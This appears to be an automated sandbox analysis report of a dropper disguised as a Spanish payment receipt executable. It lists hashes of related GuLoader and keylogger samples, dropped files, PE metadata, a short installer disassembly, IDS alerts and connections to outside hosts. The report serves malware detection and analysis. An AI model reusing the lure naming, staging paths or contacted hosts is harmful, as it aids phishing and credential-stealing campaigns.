Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | RHADAMANTHYS | Browse |
| ||
Get hash | malicious | RHADAMANTHYS | Browse |
| ||
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | GuLoader | Browse |
| |
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Vidar | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Local\Temp\nsj887A.tmp\nsExec.dll | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 53158 |
Entropy (8bit): | 5.062687652912555 |
Encrypted: | false |
SSDEEP: | 1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF |
MD5: | 5D430F1344CE89737902AEC47C61C930 |
SHA1: | 0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB |
SHA-256: | 395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7 |
SHA-512: | DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Justificante pago-09453256434687.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 68206 |
Entropy (8bit): | 5.172310613255284 |
Encrypted: | false |
SSDEEP: | 1536:JWm6iUoKIuR+xCKKijix19GzuQ47tUbYIj0ghf9:Em6imIuR3Ko194v4pUEiD9 |
MD5: | F508128E1733BB6460B9B1532382ECF6 |
SHA1: | B20F4E4AF3FE86A6DD5B7B10FCF983FAC5BF74C4 |
SHA-256: | 85B8BC66A411630746860C471286AB9BBC69BA93212E12DA8E75040DFB3A1A75 |
SHA-512: | ACC7183911452359EC33582CDF6F5FF0953BC4F09F1F5475454D17277466ABC1F9B0218E8177735F9653665FBF55555BD557B86398C3D5A4A0D697B122E81731 |
Malicious: | true |
Preview: |
Process: | C:\Users\user\Desktop\Justificante pago-09453256434687.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 313127 |
Entropy (8bit): | 7.659464645407278 |
Encrypted: | false |
SSDEEP: | 6144:fBXtVl2k39Ao5t5uQ3/+fLB8bNiX9px+Sf68lZuB3QMy1HAS6n30:fdtXzNAo5tb+d8g3gi3uiASw30 |
MD5: | 3C8436F0E7B9D6C8D25947E4374D179E |
SHA1: | 1BE9130C45876D27F39C2097771090E573697B72 |
SHA-256: | 8512544EB0068094F92CD705FD941A0F07F5697D690AA62EA351B1363F348C75 |
SHA-512: | AA229B1E5C66A78D67A06B601E5AAD9B000B4E15BD0A5F15FF001201F228FC9950418CF9B2F205FCA07BE73E70A06383766DA3804341C42C5597BCBEDCC651FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\Justificante pago-09453256434687.exe
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1106880 |
Entropy (8bit): | 7.972434784115188 |
Encrypted: | false |
SSDEEP: | 24576:3NrNYoKOHCWJSICvcVU2F3VwV5k7j5awX300zQUGtZQ:d+jEWhvsU2F3VwXgj5aEkHUGtZQ |
MD5: | 4252CD5753DEF4A484FB3313E1029E66 |
SHA1: | 19FD0734102E1EEBE6C7F42D530D30E920366E00 |
SHA-256: | 96B8248BE606C47B8955A560F3DF160A4C9026CE1956E407DAF177F17549E4F7 |
SHA-512: | 471851F39C4D058798BCE13F80C63F38E3F3196132C5FE3068982362D7C9C876670CEF2F768A8DE7ED300669A85C58B367C1B51221617A1D8AE67CDA77B82984 |
Malicious: | true |
Antivirus: |
|
Preview: |
C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\Justificante pago-09453256434687.exe:Zone.Identifier
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Justificante pago-09453256434687.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5657071 |
Entropy (8bit): | 0.15928467329934035 |
Encrypted: | false |
SSDEEP: | 768:hia6UGQo5IgoTcs1teRMojkuNW52cfotYssiEfN5RJhDjTeYJNKUGQ0yyiJ+yDKJ:RLLXHTFL |
MD5: | 7FD6A7B5493B8D6659842CBDAC26F759 |
SHA1: | 59ECA4FEF3F72F17B4F87C647836AF1EE0B7B208 |
SHA-256: | F38655E8753CF872BBC92F703C0A23F3CB35EFEA183296B92ADF3672A509162C |
SHA-512: | C300E5599EB51D0862F806DF1C6274B0D59F75E41132F85C9E47F777CDD7B2E9B67C06BC033CD1FFE1C87A7EDD6B07D3E9DAD2D280EBAB1E22C7CA6291E881F5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\Phylogenetically.del
Download File
Process: | C:\Users\user\Desktop\Justificante pago-09453256434687.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 108656 |
Entropy (8bit): | 0.1629399370348107 |
Encrypted: | false |
SSDEEP: | 48:iM4xHhYyQjrwzEa24+rFK3q01Z2FdZe/Gbjd6Ne7GJ:duhYyQjcd++7KFdZKGAw |
MD5: | ABD3958B383B1C9F43AC4E47DD12BEC4 |
SHA1: | 4248CEAF77E8A46BBFA08FC14BDAB5428D7194F6 |
SHA-256: | 30E7E92C51752F6CFD747EC30BF29792A819FDA586557B053FF141861BC3EA7B |
SHA-512: | F6FE0761F4E15D9FCCCE230FCDFC77E95A259A014654FF94A600CBA120F222ED2085B6DC3CFEC7F21177137BD5136AC42894E113EAFD1D21659FF3F14316799B |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Justificante pago-09453256434687.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6429709 |
Entropy (8bit): | 0.15806775405645646 |
Encrypted: | false |
SSDEEP: | 768:VNOwnrRrLv7/6Ngd/3fk7lv70zCxVdw2J+bxTylmmf13Y2jmVnc+1dHiqkGAr/EA:vGD8vB |
MD5: | F4FF9F83B617854EAA4804F4499C7538 |
SHA1: | C93182B840EBDDB4A16EF90F1B0AE26DC1562FBA |
SHA-256: | AFA03D58592E5BE1ADF5E352A40CE899BC707BB40CC6CD1EF5930E6302A94C18 |
SHA-512: | 2E5C29BD767EEA4939A4B82CD7DD6EC323255D9046D96CE2C1931D617D125AB96ABC1F4B5444097A3A8085356FB7BD894A5C9769710B67823228BD1C371CF756 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\indholdsfortegnelsen.mic
Download File
Process: | C:\Users\user\Desktop\Justificante pago-09453256434687.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7637195 |
Entropy (8bit): | 0.1584950093042192 |
Encrypted: | false |
SSDEEP: | 768:DASGeKc+zkfELL9UhjwNNoVJ2zV7S9OrvkoAaqV6zoPv2WHiirTgQKUIZsrj6ZzL:gXK+k |
MD5: | EB71C6BE6D08F8A7C7C9DA1335DF04C1 |
SHA1: | 7B57A40E3F6C44178A25EF465C3E7F5EA3184335 |
SHA-256: | D1D5BFF683EDC3A076382FCFE8C8A28EA1FF6A1C7731A80BAB8FFF0E82A54D07 |
SHA-512: | 5ED43E9E6A66F981DEEC765A13A361BCCEFE4E1A38C6847F9DB00F2ED1BF50497E36B6D5398190FB2CB0B191E4DA33A77C7378CDB446169941C84776D7406A48 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Justificante pago-09453256434687.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 465 |
Entropy (8bit): | 4.255544231677184 |
Encrypted: | false |
SSDEEP: | 12:ZR1EOIygKJPTYEO/OAOLkKARrQdNJdKiXkB9MOyFCZ60WgE:9xIyPtYEO/vlK6QUlE |
MD5: | 2F8A39C6A08A57605F1965012760D560 |
SHA1: | 4607DE528A646C0758D7FB322CF9CCFFAFA026B8 |
SHA-256: | 37909462973046DA9CD15B9FB1CCD7F92D97C26AF08C83A8D486BA411DC69373 |
SHA-512: | 0B2F239E494FCEE5D18812D98E3571F20B049CAF11CEA675CB55E95283A6E99E7A854DD87087EC5F7C402B7A7C760A1AB4B399EA17319C1F9249465E542E2D8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\tommelskruerne.afs
Download File
Process: | C:\Users\user\Desktop\Justificante pago-09453256434687.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2537825 |
Entropy (8bit): | 0.15731061171505112 |
Encrypted: | false |
SSDEEP: | 768:ZfmQIC91KjqGcnL63MV1HZDQDVlybvFG7dH9Sf12lqM1FBQWEP3dNaRrwPu1Br0O:Rrc |
MD5: | 6462B1502F14E3329E79F164F0B8EDA9 |
SHA1: | 70F60B7634B75DAFA601D70E812D7127F4432AD3 |
SHA-256: | 50852368EB9E21692315077EB7DD5E833B4430342695CFF4E70FEF7DF59DCFB7 |
SHA-512: | 979F463C29EFDE5C746CE6A34B72DC064BDB9364702C5DB24B567E823B6992E076BDB160979330EDDDA03F9AE4EEB20FD1E656337A2654E43B3B36673820CF45 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Justificante pago-09453256434687.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7168 |
Entropy (8bit): | 5.298362543684714 |
Encrypted: | false |
SSDEEP: | 96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW |
MD5: | 675C4948E1EFC929EDCABFE67148EDDD |
SHA1: | F5BDD2C4329ED2732ECFE3423C3CC482606EB28E |
SHA-256: | 1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906 |
SHA-512: | 61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683 |
Malicious: | false |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
File type: | |
Entropy (8bit): | 7.972434784115188 |
TrID: |
|
File name: | Justificante pago-09453256434687.exe |
File size: | 1'106'880 bytes |
MD5: | 4252cd5753def4a484fb3313e1029e66 |
SHA1: | 19fd0734102e1eebe6c7f42d530d30e920366e00 |
SHA256: | 96b8248be606c47b8955a560f3df160a4c9026ce1956e407daf177f17549e4f7 |
SHA512: | 471851f39c4d058798bce13f80c63f38e3f3196132c5fe3068982362d7c9c876670cef2f768a8de7ed300669a85c58b367c1b51221617a1d8ae67cda77b82984 |
SSDEEP: | 24576:3NrNYoKOHCWJSICvcVU2F3VwV5k7j5awX300zQUGtZQ:d+jEWhvsU2F3VwXgj5aEkHUGtZQ |
TLSH: | B535230561D5E467E0E14B36F63A18F213AA2D21C8718A2F53257F78BFB12A63D3D325 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*..... |
Icon Hash: | 4e33695d030a3f39 |
Entrypoint: | 0x4034f7 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | 56a78d55f3f7af51443e58e0ce2fb5f6 |
Signature Valid: | false |
Signature Issuer: | CN=Tehran, E=Admissory@Nonclinging.Am, O=Tehran, L=Glan Honddu, OU="Tilbyg Cayuses Ethnolinguistic ", S=Wales, C=GB |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 7125B26AD47B1EF2F57A1D334C3ED3CA |
Thumbprint SHA-1: | B9A39AEB4CB807EE90F2CE94E1298C47D6ED6196 |
Thumbprint SHA-256: | 4451356EAE3D4C11E252079D3D3D664D603B200B87E984A189B1629EE40EB0AF |
Serial: | 2DEB645BD81ED6623A453CE607AA7C569CE12379 |
Instruction |
---|
push ebp |
mov ebp, esp |
sub esp, 000003F4h |
push ebx |
push esi |
push edi |
push 00000020h |
pop edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [ebp-14h], ebx |
mov dword ptr [ebp-04h], 0040A2E0h |
mov dword ptr [ebp-10h], ebx |
call dword ptr [004080CCh] |
mov esi, dword ptr [004080D0h] |
lea eax, dword ptr [ebp-00000140h] |
push eax |
mov dword ptr [ebp-0000012Ch], ebx |
mov dword ptr [ebp-2Ch], ebx |
mov dword ptr [ebp-28h], ebx |
mov dword ptr [ebp-00000140h], 0000011Ch |
call esi |
test eax, eax |
jne 00007F680C864DAAh |
lea eax, dword ptr [ebp-00000140h] |
mov dword ptr [ebp-00000140h], 00000114h |
push eax |
call esi |
mov ax, word ptr [ebp-0000012Ch] |
mov ecx, dword ptr [ebp-00000112h] |
sub ax, 00000053h |
add ecx, FFFFFFD0h |
neg ax |
sbb eax, eax |
mov byte ptr [ebp-26h], 00000004h |
not eax |
and eax, ecx |
mov word ptr [ebp-2Ch], ax |
cmp dword ptr [ebp-0000013Ch], 0Ah |
jnc 00007F680C864D7Ah |
and word ptr [ebp-00000132h], 0000h |
mov eax, dword ptr [ebp-00000134h] |
movzx ecx, byte ptr [ebp-00000138h] |
mov dword ptr [0042A2D8h], eax |
xor eax, eax |
mov ah, byte ptr [ebp-0000013Ch] |
movzx eax, ax |
or eax, ecx |
xor ecx, ecx |
mov ch, byte ptr [ebp-2Ch] |
movzx ecx, cx |
shl eax, 10h |
or eax, ecx |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x54000 | 0x159b8 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x10dca0 | 0x720 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x6515 | 0x6600 | 26e66bea3b62728a217ae7bf343ebc1a | False | 0.6615349264705882 | data | 6.439707948554623 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x139a | 0x1400 | 691f0273dad50ec603f6fedf850b58ee | False | 0.45 | data | 5.145774564074664 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xa000 | 0x20338 | 0x600 | 4b75405561a3fcc45b8fe27a6808f3b5 | False | 0.4993489583333333 | data | 4.013698650446401 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x2b000 | 0x29000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x54000 | 0x159b8 | 0x15a00 | 99e35a8b4499e294dd3cd1daedb48858 | False | 0.8200754154624278 | data | 7.353353976387772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x54418 | 0x9e8c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9934217009953681 |
RT_ICON | 0x5e2a8 | 0x3344 | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.9758457787259982 |
RT_ICON | 0x615f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.41275933609958504 |
RT_ICON | 0x63b98 | 0x1743 | PNG image data, 256 x 256, 4-bit colormap, non-interlaced | English | United States | 0.9952980688497062 |
RT_ICON | 0x652e0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4580206378986867 |
RT_ICON | 0x66388 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304 | English | United States | 0.5692963752665245 |
RT_ICON | 0x67230 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | English | United States | 0.6601985559566786 |
RT_ICON | 0x67ad8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.5 |
RT_ICON | 0x68140 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | English | United States | 0.5238439306358381 |
RT_ICON | 0x686a8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6063829787234043 |
RT_ICON | 0x68b10 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.6747311827956989 |
RT_ICON | 0x68df8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.8074324324324325 |
RT_DIALOG | 0x68f20 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x69020 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x69140 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x69208 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x69268 | 0xae | data | English | United States | 0.632183908045977 |
RT_VERSION | 0x69318 | 0x274 | data | English | United States | 0.47611464968152867 |
RT_MANIFEST | 0x69590 | 0x423 | XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators | English | United States | 0.5127478753541076 |
DLL | Import |
---|---|
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW |
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW |
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree |
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked |
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu |
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject |
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-16T18:28:44.726551+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49736 | 172.217.19.174 | 443 | TCP |
2024-12-16T18:28:52.347535+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49738 | 158.101.44.242 | 80 | TCP |
2024-12-16T18:28:55.285176+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49738 | 158.101.44.242 | 80 | TCP |
2024-12-16T18:28:56.968822+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49740 | 104.21.67.152 | 443 | TCP |
2024-12-16T18:28:58.363210+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49742 | 158.101.44.242 | 80 | TCP |
2024-12-16T18:29:13.174013+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49781 | 104.21.67.152 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 16, 2024 18:28:42.098860979 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174 |
Dec 16, 2024 18:28:42.098908901 CET | 443 | 49736 | 172.217.19.174 | 192.168.2.4 |
Dec 16, 2024 18:28:42.099065065 CET | 49736 | 443 | 192.168.2.4 | 172.217.19.174 |
